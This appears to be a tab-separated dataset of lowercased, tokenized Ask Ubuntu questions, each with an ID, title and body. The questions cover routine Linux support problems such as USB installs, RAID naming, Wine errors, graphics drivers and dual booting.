209606	which usb 2.0 pen drive will be best durable if i install ubuntu in it ?	i want to install 12.10 in a usb 2.0 pen drive . i just want to know which brand will be more reliable ? i want to use it for long time purpose . i also want good reading and writing speed from the drive and onto the drive .
209607	unstable after moving headless server from usb-hdd to usb pendrive	ubuntu server 12.04.1 running from usb-hdd is rock solid for months . after copying the partitions to a kingston usb pendrive the system will only run for 3-4 days before some services fail . is running 12.04.1 from usb pendrive a viable approach ? how do i troubleshoot the problem ? in the meanwhile , i have reverted back to usb-hdd . willing to buy a usb pendrive that is known to work . recommendations ?
209608	set default jdk version on launchpad packaging system	hello there for my application i need to set the default jdk for building my packages . normally i would execute sudo update-alternatives -- config java but how to do something like this in launchpad ? because i get the error /build/buildd/2stream-0.0.2/build.xml:46 : unable to find a javac compiler ; com.sun.tools.javac.main is not on the classpath . perhaps java_home does not point to the jdk . it is currently set to `` /usr/lib/jvm/java-6-openjdk-i386/jre '' it needs to build using openjdk 7 . i did specify it as a build dependency in the control file . i even set java_home=/usr/lib/jvm/java-7-openjdk-amd64 . but it did n't work . is there another way to make sure the whole compile session will have the java_home environment variable . so it will be visible to every application . update : i do have openjdk-7-jdk installed and openjdk-7-jre installed but the problem is that for some reason it defaults to openjdk-6 ( which i did n't install )
209611	how to remove lingering /etc/openvpn/ directory after removing openvpn package ?	i wan na completely remove openvpn from my pc ( linux ubuntu 12.04 ) but when i type sudo apt-get remove openvpn the /etc/openvpn/ folder remains ... how can i delete this too ? i wan na delete openvpn so i can install it again cause i think i did something stupid in the first time : / do you know how to complete remove it ? can you recommend me a good detailed tutorial about installing openvpn in ubuntu 12.10 and how to make certificates ? thanks for your time sorry for my grammar : )
209615	change cpan install directory	i have tried to setup cpan on my ubuntu 12.04 using : sudo cpan and it created a folder perl5 in my $ home folder . i would like to use a different directory such as $ home/.perl5 or somewhere in /usr/local/lib for the modules . is it possible ?
209618	partition table necessary for dd ?	here is installation of 12.10 without partition table . now i want to make a copy of harddisk 1:1 onto a bigger harddisk . is dd if=/dev/harddisk1 of=/dev/harddisk2 working ? or do i need to make a partition table first with fdisk resp . cfdisk ? thanks for the link . have i to care about block-size in reference to between normal hard-disk ( silicium ) and ssd-harddisk ? or is block-size not mattering whether if normal hard-disk resp . ssd ?
209622	install ruby 1.8 documentation ?	my ubuntu 12.04 already have ruby 1.8 installed , but i ca n't find a way to install documentation for ri , tried with libcommandline-ruby-doc package but it seems it 's not it ?
209625	x3daudio1_7.dll and xapofx1_5.dll for gaming in wine	i 'm trying to play xcom on wine ( using play on linux ) . unfortunately , this does n't work . the debug option in pol outputs this : running wine-1.5.15 play-xcom.exe ( working directory : /home/stephen/.playonlinux/wineprefix/xcom/drive_c/xcom enemy unknown ) p11-kit : could n't load module : /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so : /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so : can not open shared object file : no such file or directoryfixme : shell : shautocomplete stub fixme : exec : shell_execute flags ignored : 0x00000180 err : module : import_dll loading library x3daudio1_7.dll ( which is needed by l '' c : \\xcom enemy unknown\\binaries\\win32\\xcomgame.exe '' ) failed ( error c000007b ) . err : module : import_dll loading library xapofx1_5.dll ( which is needed by l '' c : \\xcom enemy unknown\\binaries\\win32\\xcomgame.exe '' ) failed ( error c000007b ) . err : module : ldrinitializethunk main exe initialization for l '' c : \\xcom enemy unknown\\binaries\\win32\\xcomgame.exe '' failed , status c0000135 this leads me to believe that wine is missing x3daudio1_7.dll and xapofx1_5.dll . i transfered these files from my windows install into /home/stephen/.playonlinux/wineprefix/xcom/drive_c/windows/system32 but it still gives me the same error . what can i do ? i tried using wine overrides but that did n't seem to help either . i 'm running xubuntu 12.04 , xcom is running in wine 1.5.15
209627	can you dual boot ubuntu 12.04 and 12.10 ?	i kind new to ubuntu and installed 12.04 lts to get an old pentium run computer from the grave . now i want to try out 12.10 and soon enough get my other computer to run it .
209632	dropbox not installing on ubuntu 12.10	i 'm running a pc with ubuntu 12.10 . i require `` dropbox '' to be installed on this machine , and chose to look for it in the `` software center '' and start the installation from there . the following happens : the installation starts fine the installation then requires that `` nautilus '' be restarted ( dropbox requires nautilus to be restarted to function properly ) i click on the `` restart nautilus '' button then nothing happens ... . the dropbox icon shows on the left `` launch bar '' , but when you click on it it does nothing as well - except for requesting authentication .
209634	mount the directory / home directory located on a remote windows 2008 r2	i am currently working on the integration of ubuntu 12.04 lts linux on an active directory domain in windows 2008 r2 . i have managed to integrate my ubuntu 12.04 machine to ad 2008 , my user successfully authenticates to the ad logon . software used : samba - winbind - kerberos - ntp for mounting partitions , i installed : libpam-mount everything works when i mount the share eg / media my config file : / etc / security / pam_mount.conf.xml < volume fstype= '' cifs '' server= '' share_server '' path= '' % ( user ) $ '' mountpoint= '' /media/ % ( user ) '' user= '' * '' / > i can create and delete files without problems . my problem i currently blocks on mounting / home for users ( like roaming profile ) my config file : / etc / security / pam_mount.conf.xml < volume fstype= '' cifs '' server= '' share_server '' path= '' % ( user ) $ '' mountpoint= '' /home/ % ( user ) '' user= '' * '' options= '' rw , auto , iocharset=utf8 '' / > i configured the / etc / pam.d / common-session session required pam_mkhomedir.so it automatically create the tree if it is missing , locally it does well , but not with the network mount ( well it does not because there 's some good directories and files created anyway ) when i open the session , i find myself on the empty desktop , no menu , no application launcher . i have some files that can be found in the user directory on server 2008 : desktop , documents , videos , ... i do not see where the problem is . thank you in advance if anyone can give me a little help . cordially laurent
209636	how to change decimal comma to decimal period in numpad ?	how to change the decimal comma ' , ' to decimal period ' . ' in the numeric pad of the keyboard ? i have used xmodmap but every time that i change my keyboard layout the changes ( by xmodmap ) are being reset .
209640	how to use vpnc on ubuntu with smart card authentication	has anyone done this successfully ? i 've been using vpnc to work remotely for one of my major clients and they 've recently added the restriction that the connection must be authenticated with a smart card . i really do n't want to have to go back to using windows to do all my work for them .
209642	upgrade issues ubuntu 12.04	i recently upgraded from 11.10 to 12.04 , during the upgrade process the computer was hung up on a process and became what seemed to be unresponsive . after waiting about 9 hours for the process to complete with no success , i just turned off the computer . probably not the best call and what makes matters worse is i did not backup my data . i have made this mistake before however i was able to boot back up and the old os was still there and user data was preserved . that was a malfunction that ended up benefitting from in the end , but this time not so lucky . i rebooted and just after the bios screen the computer sits at a screen that is just a black screen with a single blinking cursor in the top left corner . nothing can be typed or commanded . is there an os on the machine anymore ? is my user data and home folder still available ? could i just insert by ubuntu 10 disc and re-install ... or use without installing ... to potentially recover any remaining data ? ?
209646	how to access localhost on my ubuntu laptop from android tablet ?	i 'm developing websites and i want to preview the ones from localhost on my nexus7 .
209647	difference between programs in software centre and launchpad ppa	on several ubuntu sites such as omg ubuntu there are summaries of new ppa 's . these are useful programs , but they do n't appear in the software center . however , in the center there are programs that specifically say are `` community supported '' and not canonical supported . so what is the difference between software center programs and ppa 's ? it would be a lot more useful if more ppas were in the center .
209650	autostart xbmc at boot	i 'm running ubuntu 12.10 desktop 64-bit . i 've installed the latest version of xbmc ( eden ) . everything seems to be working great . the only small issue i 'm running into is that i ca n't figure out how to make xbmc launch automatically on boot/restart . in the 'startup applications preferences ' dialog in ubuntu i have added a new launcher with the command /usr/bin/xbmc and ticked the checkbox next to it . when i restart though xbmc does n't launch . i know this is the correct path because i ran which xbmc in the terminal to confirm it . am i doing something really stupid here ? how come xbmc wo n't launch automatically ? it works fine if i click its icon in the dock . many thanks ,
209653	ubuntu 11.10 does not see all the memory	i have 11.10 64bit installed on my lenovo s205 . when i install 2g ( confirmed by the bios ) , `` systems info '' only sees 1.6gib , and when i install 3g , it only sees 2.6gib . if seen some pages suggesting i run sudo apt-get install linux-generic-pae linux-headers-generic-pae after first calling for update , but i get the reply that it is impossible to install this . it might be that these post refer to previous releases , and i get the impression that this is more for people who have installed the 32b version , but is there anything i can do ? $ sudo apt-get install linux-generic-pae linux-headers-generic-paereading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies . linux-generic-pae : i386 : depends : linux-image-generic-pae : i386 ( = 3.0.0.27.31 ) but it is not going to be installed linux-headers-generic-pae : i386 : depends : linux-headers-3.0.0-27-generic-pae : i386 but it is not going to be installed e : unable to correct problems , you have held broken packages .
209654	why do some 12.04 ppas not work in 12.10 ?	after a fresh install of quantal some of the ppas from precise do n't work . even with apps such as lightread that were recently created and from the precise software centre . is there a separate software centre for each release ? do ppas work across versions ?
209657	remove webapss icon from launcher and switcher	i like the webapps integration in sound/messaging menus , but i do n't need them to be in my launcher when they are running and neither do i want them in my switcher . in case i need the apps , i can move to the desired tab myself through firefox . ( in combination with grouping tabs , the launcher/switcher icons will not even move to the right tab , but even if it would do that , i would not be interested )
209671	pluscom mac address shows up but `` wireless unavailable ''	i 've got a pluscom pci card plugged into my desktop and although the mac address shows up in network manager , it says `` wireless unavailable '' . i 'm using ubuntu 12.10 gnome shell remix ... edgar @ edgarquantal : ~ $ iwconfig eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bg essid : off/any mode : managed access point : not-associated tx-power=0 dbm retry long limit:7 rts thr : off fragment thr : off power management : off edgar @ edgarquantal : ~ $ ifconfig eth0 link encap : ethernet hwaddr 6c : f0:49:02:1f : b8 inet addr:192.168.0.7 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :6ef0:49ff : fe02:1fb8/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1425 errors:0 dropped:0 overruns:0 frame:0 tx packets:1393 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:995753 ( 995.7 kb ) tx bytes:134079 ( 134.0 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:363 errors:0 dropped:0 overruns:0 frame:0 tx packets:363 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:40828 ( 40.8 kb ) tx bytes:40828 ( 40.8 kb ) it looks the same as the problem as here , seems quite complicated : http : //ubuntuforums.org/showthread.php ? t=1993226 tried downloading the driver but i get this : '' unpacking firmware-ralink ( from ... /firmware-ralink_0.36_all.deb ) ... dpkg : error processing /home/edgar/downloads/firmware-ralink_0.36_all.deb ( -- install ) : trying to overwrite '/lib/firmware/rt2870.bin ' , which is also in package linux-firmware 1.95 ''
209672	installing ubuntu 12.10 on mac mini ( end 2009 )	i am trying to installing ubuntu 12.10 on my mac mini ( end 2009 ) . this sounds like a often asked question and i all ready read lots of stuff about it , but now i am confused . while some people say , there are heavy problems by installing ubuntu on a mac mini , such as components ( like sound card , graphic card , âś ) do n't work very well , others say , that it should work perfectly fine . i figured out that installing ubuntu on a mac is n't as easy ( ca n't just download the .iso and use unetboot , âś ) as it is on a pc . so , is it possible to install ubuntu 12.10 on a mac mini 2009 ( end ) , so everything works well ?
209675	how do i remove ubuntu 12.04 lts from my windows 7 computer ?	i have a problem . i want my windows 7 back . i installed ubuntu from a usb flash-drive . and it 's dualbooting with windows 7 . i do n't know how to delete ubuntu 12.04 lts from my computer for free ? please help me ... ...
209684	where can i find the startup application list in a cinnamon desktop ?	where can i find the startup application list in a cinnamon + ubuntu desktop ?
209689	defaulting internet requests to wlan0 when also connected to eth0	i am trying to configure an ubuntu 10.04 desktop edition as a server . i currently have the dhcp server working through eth0 . my problem is that i only have one ethernet port , and am receiving internet though a mobile hotspot on my phone through wlan0 , and whenever i attempt to connect through wlan0 and eth0 i am unable to access the internet through the server or the clients . when i disconnect from eth0 i then regain access . i have searched extensively for a solution , and have come up short . any help is appreciated .
209692	where are thunderbird messages saved while offline ?	yesterday i wrote an email while offline and , since it was not ready i chose the `` save '' option instead of `` send later '' . my account is a gmail account and now that i 'm connected , i ca n't find the message i had written . can anybody help me find this message ? it is not in the drafts folder , nor in outbox , inbox or sent items . local folders is empty .
209693	could n't find package dd	i have run sudo apt-get update and upgrade , but apt-get install dd fails as above . i am using xandros on a asus eeepc .
209694	ctrl+enter-textarea-submitting addon firefox	does someone know an addon which allows me to submit a whole form during textarea writing with ctrl+enter or another key shortcut ? thanks for helping .
209701	error when i try to install desktop integration features for openoffice	peng @ peng-thinkpad-sl410 : ~ $ cd '/home/peng/downloads/en-us/debs/desktop-integration ' peng @ peng-thinkpad-sl410 : ~/downloads/en-us/debs/desktop-integration $ sudo dpkg -i *.deb ( reading database ... 357248 files and directories currently installed . ) unpacking openoffice.org-debian-menus ( from openoffice.org3.4-debian-menus_3.4-9593_all.deb ) ... dpkg : error processing openoffice.org3.4-debian-menus_3.4-9593_all.deb ( -- install ) : trying to overwrite '/usr/bin/soffice ' , which is also in package libreoffice-common 1:3.6.2~rc2-0ubuntu3 /usr/bin/gtk-update-icon-cache gtk-update-icon-cache : cache file created successfully . /usr/bin/gtk-update-icon-cache gtk-update-icon-cache : cache file created successfully . processing triggers for menu ... processing triggers for hicolor-icon-theme ... processing triggers for gnome-icon-theme ... processing triggers for shared-mime-info ... unknown media type in type 'all/all' unknown media type in type 'all/allfiles' unknown media type in type 'uri/mms' unknown media type in type 'uri/mmst' unknown media type in type 'uri/mmsu' unknown media type in type 'uri/pnm' unknown media type in type 'uri/rtspt' unknown media type in type 'uri/rtspu' processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... errors were encountered while processing : openoffice.org3.4-debian-menus_3.4-9593_all.deb can anyone solve the problem ?
209702	why is my raid /dev/md1 showing up as /dev/md126 ? is mdadm.conf being ignored ?	i created a raid with : sudo mdadm -- create -- verbose /dev/md1 -- level=mirror -- raid-devices=2 /dev/sdb1 /dev/sdc1 sudo mdadm -- create -- verbose /dev/md2 -- level=mirror -- raid-devices=2 /dev/sdb2 /dev/sdc2 sudo mdadm -- detail -- scan returns : array /dev/md1 metadata=1.2 name=ion:1 uuid=aa1f85b0 : a2391657 : cfd38029:772c560e array /dev/md2 metadata=1.2 name=ion:2 uuid=528e5385 : e61eaa4c:1db2dba7:44b556fb which i appended it to /etc/mdadm/mdadm.conf , see below : # mdadm.conf # # please refer to mdadm.conf ( 5 ) for information about this file . # # by default ( built-in ) , scan all partitions ( /proc/partitions ) and all # containers for md superblocks . alternatively , specify devices to scan , using # wildcards if desired . # device partitions containers # auto-create devices with debian standard permissions create owner=root group=disk mode=0660 auto=yes # automatically tag new arrays as belonging to the local system homehost < system > # instruct the monitoring daemon where to send mail alerts mailaddr root # definitions of existing md arrays # this file was auto-generated on mon , 29 oct 2012 16:06:12 -0500 # by mkconf $ id $ array /dev/md1 metadata=1.2 name=ion:1 uuid=aa1f85b0 : a2391657 : cfd38029:772c560e array /dev/md2 metadata=1.2 name=ion:2 uuid=528e5385 : e61eaa4c:1db2dba7:44b556fb cat /proc/mdstat returns : personalities : [ raid1 ] [ linear ] [ multipath ] [ raid0 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md2 : active raid1 sdb2 [ 0 ] sdc2 [ 1 ] 208629632 blocks super 1.2 [ 2/2 ] [ uu ] md1 : active raid1 sdb1 [ 0 ] sdc1 [ 1 ] 767868736 blocks super 1.2 [ 2/2 ] [ uu ] unused devices : < none > ls -la /dev | grep md returns : brw-rw -- -- 1 root disk 9 , 1 oct 30 11:06 md1 brw-rw -- -- 1 root disk 9 , 2 oct 30 11:06 md2 so i think all is good and i reboot . after the reboot , /dev/md1 is now /dev/md126 and /dev/md2 is now /dev/md127 ? ? ? ? ? sudo mdadm -- detail -- scan returns : array /dev/md/ion:1 metadata=1.2 name=ion:1 uuid=aa1f85b0 : a2391657 : cfd38029:772c560e array /dev/md/ion:2 metadata=1.2 name=ion:2 uuid=528e5385 : e61eaa4c:1db2dba7:44b556fb cat /proc/mdstat returns : personalities : [ raid1 ] [ linear ] [ multipath ] [ raid0 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md126 : active raid1 sdc2 [ 1 ] sdb2 [ 0 ] 208629632 blocks super 1.2 [ 2/2 ] [ uu ] md127 : active ( auto-read-only ) raid1 sdb1 [ 0 ] sdc1 [ 1 ] 767868736 blocks super 1.2 [ 2/2 ] [ uu ] unused devices : < none > ls -la /dev | grep md returns : drwxr-xr-x 2 root root 80 oct 30 11:18 md brw-rw -- -- 1 root disk 9 , 126 oct 30 11:18 md126 brw-rw -- -- 1 root disk 9 , 127 oct 30 11:18 md127 all is not lost , i : sudo mdadm -- stop /dev/md126 sudo mdadm -- stop /dev/md127 sudo mdadm -- assemble -- verbose /dev/md1 /dev/sdb1 /dev/sdc1 sudo mdadm -- assemble -- verbose /dev/md2 /dev/sdb2 /dev/sdc2 and verify everything : sudo mdadm -- detail -- scan returns : array /dev/md1 metadata=1.2 name=ion:1 uuid=aa1f85b0 : a2391657 : cfd38029:772c560e array /dev/md2 metadata=1.2 name=ion:2 uuid=528e5385 : e61eaa4c:1db2dba7:44b556fb cat /proc/mdstat returns : personalities : [ raid1 ] [ linear ] [ multipath ] [ raid0 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md2 : active raid1 sdb2 [ 0 ] sdc2 [ 1 ] 208629632 blocks super 1.2 [ 2/2 ] [ uu ] md1 : active raid1 sdb1 [ 0 ] sdc1 [ 1 ] 767868736 blocks super 1.2 [ 2/2 ] [ uu ] unused devices : < none > ls -la /dev | grep md returns : brw-rw -- -- 1 root disk 9 , 1 oct 30 11:26 md1 brw-rw -- -- 1 root disk 9 , 2 oct 30 11:26 md2 so once again , i think all is good and i reboot . again , after the reboot , /dev/md1 is /dev/md126 and /dev/md2 is /dev/md127 ? ? ? ? ? sudo mdadm -- detail -- scan returns : array /dev/md/ion:1 metadata=1.2 name=ion:1 uuid=aa1f85b0 : a2391657 : cfd38029:772c560e array /dev/md/ion:2 metadata=1.2 name=ion:2 uuid=528e5385 : e61eaa4c:1db2dba7:44b556fb cat /proc/mdstat returns : personalities : [ raid1 ] [ linear ] [ multipath ] [ raid0 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md126 : active raid1 sdc2 [ 1 ] sdb2 [ 0 ] 208629632 blocks super 1.2 [ 2/2 ] [ uu ] md127 : active ( auto-read-only ) raid1 sdb1 [ 0 ] sdc1 [ 1 ] 767868736 blocks super 1.2 [ 2/2 ] [ uu ] unused devices : < none > ls -la /dev | grep md returns : drwxr-xr-x 2 root root 80 oct 30 11:42 md brw-rw -- -- 1 root disk 9 , 126 oct 30 11:42 md126 brw-rw -- -- 1 root disk 9 , 127 oct 30 11:42 md127 what am i missing here ?
209706	adding hard drive failed	i was using von welch 's instructions to install a 500 gb seagate drive to write the recordings to . everything seemed to be going okay until mkfs /dev/sdb1 then we get an error message : mkfs.ext2 : inode_size ( 128 ) * inodes_count ( 0 ) too big for a filesystem with 0 blocks , specify a higher inode_ratio ( -i ) or lower inode count ( -n ) my son is trying to help me but this is beyond him . our knowledge of unix/linux is very limited . at work the support people just sent me a line by line cook book . the computer is a gateway mdp e4000 with mythbuntu installed on a pata drive and we are adding a sata drive for the second drive . the bios sees the drive . i would appreciate any help you can give us .
209707	how do i get drivers working for an nvidia gt560i on 12.04 ?	i been using a test xubuntu 12.04 lts on my 64 bit workstation , because ubuntu has dropped support for the nvidia graphic adapters my 10.04 lts and i have n't been able to get them working . now update manager has upgraded the kernel from 3.2.0-30-generic to 3.2.0-31-generic , and failed to produce a working nvidia module that the x server can load . fortunately , when launching the 3.2.0-30-generic kernel , i still have use of the x server . does anybody know a work-around or fix for this ? i 'm really worried , this is the last working ubuntu distribution os on the computer and i do n't want to give up on ubuntu . details of problem here . the system ( hardware ) successfully boots arclinux x86_64 , vista ult 64 , windows xp x64 . before problems with nvidia graphic adapters , the system boot successfully ubuntu 10.04 lts . the output of lspci -v is here .
209712	problem with wubi installation	i am getting a black screen with the following message when i reboot my pc after the installation via wubi . i tried again and again but still i get this screen and then it 's stuck . message : pwconv : failed to change the mode of etc/passwd- to 0600 shadow passwords are on . generating locals ... and it continues for a few more lines and then stops . what is that i am doing wrong ?
209714	adding root privileges to a bash script	i am in need of adding root privileges to a bash script which uses sudo ; so that whenever we run the script from the terminal ; irrespective of the fact that the user is root or not it should not prompt for password . please help ! doing run bash script as root did not help .
209715	microphone not working at all	i am running kubuntu 12.04 microphone worked fine for a while front and rear microphone ( i am on a desktop not laptop ) . at a moment the microphone stop working , i tried creating a new account , reseting alsa setings , reseting alsamixer , reinstaling pulseaudio . i installed pavucontrol and audacity and tried all the combinations , front/rear . i am sure that the microphone is not muted ( checked and unmuted from alsamixer and pavucontrol ) . i also tried kubuntu 12.10 and no success . in pavucontrol at input devices i get in the meter only nise for front microphone and for rear microphone i get nothing . i think i read hours in forums , questions on this website and all for nothing . i need some instructions on how to proceed next on debugging this until i will get a usb microphone . my hardware is simi @ simi-system-product-name : ~ $ lspci|grep audio 00:14.2 audio device : advanced micro devices [ amd ] nee ati sbx00 azalia ( intel hda ) 01:05.1 audio device : advanced micro devices [ amd ] nee ati rs880 hdmi audio [ radeon hd 4200 series ]
209716	how can i install the atheros ar8161 drivers without an internet connection ?	following this question how do i install drivers for the atheros ar8161 ethernet controller ? to be able to compile i need some packages . is there any `` bundle '' of the required packages ( build-essentials and what other is needed so i can download and install manually from a usb ? i do not have internet on linux
209717	how can i share my wired internet connection via the wireless adapter on my satellite a50-543 ?	i have an old laptop which currently runs windowsxp . i have got recently an android phone with just wifi . now i want to use my laptop as bridge ( via wifi ) , so that i can connect from my android to internet through laptop . because windowsxp does not support access point ( ap ) mode , i ca n't use it with android . i 'm thinking of installing ubuntu on the laptop . will it work ? and how to do it ? here are the specs of the laptop .
209723	cd/dvd drive not being read/wo n't mount	i 've looked all over the web and i ca n't find an answer to my problem . a few days ago when i would insert a cd , it would auto mount , but now for some reason it is n't showing up . i was using ubuntu 12.04 when this started happening , then i re-installed 11.10 thinking that would fix it , but it did n't . i 'm pretty sure the drive is being recognized when the computer starts up , but i 'm not positive . any help would be greatly appreciated . if you need any outputs from commands just let me know .
209725	fonts in firefox weird after installing kubuntu-desktop	i 've installed kde with the intentions to try it out , but now , after removing it and going back to unity , i noticed that the fonts in firefox are still like in kde . how can i revert the font type to before kde was installed ?
209741	how to disable sip auto answer	i just noticed that my sip ( session initiation protocol ) client automatically answer all incoming calls . not good . i 'm using telepathy-sofiasip with empathy . i wonder how i can disable the auto-answer ?
209743	pdfs do n't render correctly with firefox and pdf.js	while using firefox on windows , pdf.js worked beautifully . it was honestly amazing . but on ( k ) ubuntu , it fails to render the files - not just some , but any ( which is why i 'm posting here ) . for example , i searched for 'pdf ' on google and opened the first pdf file , and it looked like this : all pdfs look like this , some even worse . has anyone else had this problem ? i found a few posts about terrible font rendering with pdf.js , but all those posters said it had been resolved with an update ... i have already tried disabling all addons , reinstalling firefox ( i even reinstalled kubuntu ( not because of this problem ) ) .
209746	how to remove gnome completely ?	i want make my installed ubuntu as light as possible to launch only on 256mb ram machine ( virtualbox ) ? so i 'm thinking about removing gnome and related components completely . how can i do that ? this link does not help me : http : //complete-concrete-concise.com/ubuntu-2/ubuntu-12-04/ubuntu-12-04-how-to-completely-uninstall-remove-gnome
209747	calling script with start/stop	i wonder if system will call my script located in /etc/network/if-up.d/ or /etc/network/if-down.d/ with start or stop . the reason i am asking is that i have a script which can be called with start/stop command line arguments . in order to use with if-up.d i have to split the script into 2 parts . is there a better way to place the script into /etc/network/if-up.d/ without splitting ?
209755	dual boot-windows 7 and ubuntu	i have windows 7 installed on my laptop , i want to install ubuntu 12.10 without losing windows . is it possible that during boot up , it gives me an option to chose how i want to boot after installing both the operating systems for those of you who have tried dual booting
209762	i can not upgrade to 12.10 because of graphic-card , radeon hd 3450	i wonder what has happened . i have ubuntu 12.04 and ati radeon hd 3450 and that has supported 3d , now suddenly it does not accept my graphic-card . i really would like to know what to do ? should i buy a new graphic card or is there a way to use my graphic-card on 12.10 ? and if so what is there a graphic-card i should buy ? my ati is functioning with 3d , on 12.04 i do n't understand why it will not upgrade to 12.10 .
209772	driver video nvidia nvidia-173 uninstallable on 12.10 quantal quetzal	packages are available from the archive but uninstallable . nvidia-173 : depends : xorg-video-abi-11 or xorg-video-abi-12 but it is not installable recommends : nvidia-settings but it is not going to be installed e : unable to correct problems , you have held broken packages .
209775	have everything installed , edited bios settings ( might be wrong ) and i still get 'missing operating system ' ?	downloaded ubuntu and transferred it to a usb using unetbootin for mac . my dell mini 9 , when i plug the usb in , comes up with 'missing operating system ' . not sure if i missed a step but it appears i have everything on the usb that is needed . unless i 've added something unnecessary like the actual ubuntu 12.10 iso file ?
209778	auto-completion does not work for `` sudo apt-get install ''	okay a college of mine just showed me that you could do sudo apt-get install < type first letters of package > < tab > that it auto-completes the name of the package . just for an example ... sudo apt-get install ged < tab > results in sudo apt-get install gedit now i tried to do this but this does not work for me . how can i solve this ? do i have to install a package ? my college told me that he did n't install anything extra for it .
209783	why is n't unredirect fullscreen windows enabled by default ?	i 'm a developer and even i had to use google to find out what is wrong with my 3d performance . it 's ridiculous that a new user should know about ccsm and the unredirect fullscreen windows setting . why it is n't enabled by default ? anyway , i 'm still happy now that i 've found that setting .
209784	xdotool : unknown command : 21043361	as far as i know the below line of code should pull into focus the open nautilus window xdotool windowactivate `xdotool search -- onlyvisible -- class nautilus` but i am getting the error xdotool : unknown command : 21043361
209787	getting `` python ( v2.7 ) requires to install plugins '' error during ripping	i have just installed ubuntu 12.10 from a flash drive that you create from the official ubuntu website . i am getting some errors on the system quite frequently . i have tried redoing it but i keep having the same problems . i am using a dell latitude e6400 . the biggest error that i keep running into and no one has been able to answer is when i try ripping a cd using rhythmbox . i have tried other software to rip the cd but keep getting the same error regardless of what software i use . this is the error i get . `` python ( v2.7 ) requires to install plugins to create media files of the following type : vorbis encoder '' now i have installed every python package i can find . i uninstalled rhythmbox and reinstalled it . when this message comes up there is a the option to `` install '' the missing plugin . i click it and it also informs me of an error about the package not found . i would appreciate any help i can get from anyone . ubuntu 12.10 looks like it has some nice features but it so far has been nothing but frustrating .
209792	using the setup cd for a new canon printer	i have a new printer -- do i need to run the setup cd rom that came with the printer ?
209793	in what language i can develop a status notifier of a laptop battery ?	i want develop a little software or notification system of status or information battery , because sometimes i forget disconnect my charger and my battery is overloaded . i would like to develop an application that will show me a message in the middle of the screen similar to windows 8 . i never developed an application to linux ubuntu/mint that is why i like to create something like that and know that you can access functions , hardware or system components . i hope i have explained and thanks in advance ! note : i use linux mint but i think it does not matter because it is based on debian like ubuntu
209795	epson xp 605 printer driver for ubuntu	does anyone know where i can download a printer driver for an epson xp 605 all in one printer/copier/scanner
209801	kubuntu ca n't set resolution on laptop screen	i have a problem with my laptop screen . my machine : emachine e725 by acer os : kubuntu 12.04 $ lspci 00:00.0 host bridge : intel corporation mobile 4 series chipset memory controller hub ( rev 09 ) 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 09 ) 00:02.1 display controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 09 ) 00:1a.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 ( rev 03 ) 00:1a.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 ( rev 03 ) 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 03 ) 00:1c.0 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 1 ( rev 03 ) 00:1c.1 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 2 ( rev 03 ) 00:1c.2 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 3 ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 03 ) 00:1d.3 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev 93 ) 00:1f.0 isa bridge : intel corporation ich9m lpc interface controller ( rev 03 ) 00:1f.2 sata controller : intel corporation 82801ibm/iem ( ich9m/ich9m-e ) 4 port sata controller [ ahci mode ] ( rev 03 ) 00:1f.3 smbus : intel corporation 82801i ( ich9 family ) smbus controller ( rev 03 ) 04:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) 05:00.0 ethernet controller : atheros communications inc. ar8132 fast ethernet ( rev c0 ) i tried everything i found i internet ( xterm , xrandr etc . ) $ xhost +localhost no protocol specified no protocol specified xhost : unable to open display `` :0 '' $ xrandr no protocol specified no protocol specified ca n't open display :0 /etc/default/grub grub_default= '' previous linux versions > ubuntu , za pomocä systemu linux 2.6.38-11-generic '' # grub_hidden_timeout= '' 100 '' grub_hidden_timeout_quiet= '' false '' grub_timeout= '' 100 '' grub_distributor= '' `lsb_release -i -s 2 > /dev/null || echo debian` '' grub_cmdline_linux_default= '' quiet splash i915.invert_backlight=1 '' grub_cmdline_linux= '' quiet splash i915.invert_backlight=1 '' i do n't know what to do . please help .
209802	iphone like folders ? for gnome classic	i want the iphone like folder for gnome classic how do i get them ?
209803	how do i eliminate a green line at the top of my screen ?	i have a dell vostro 2420/2520 and when i update the drivers , a green line appears at the top of the screen . any idea on how to get rid of that ? also , how do i get my wireless internet to work ?
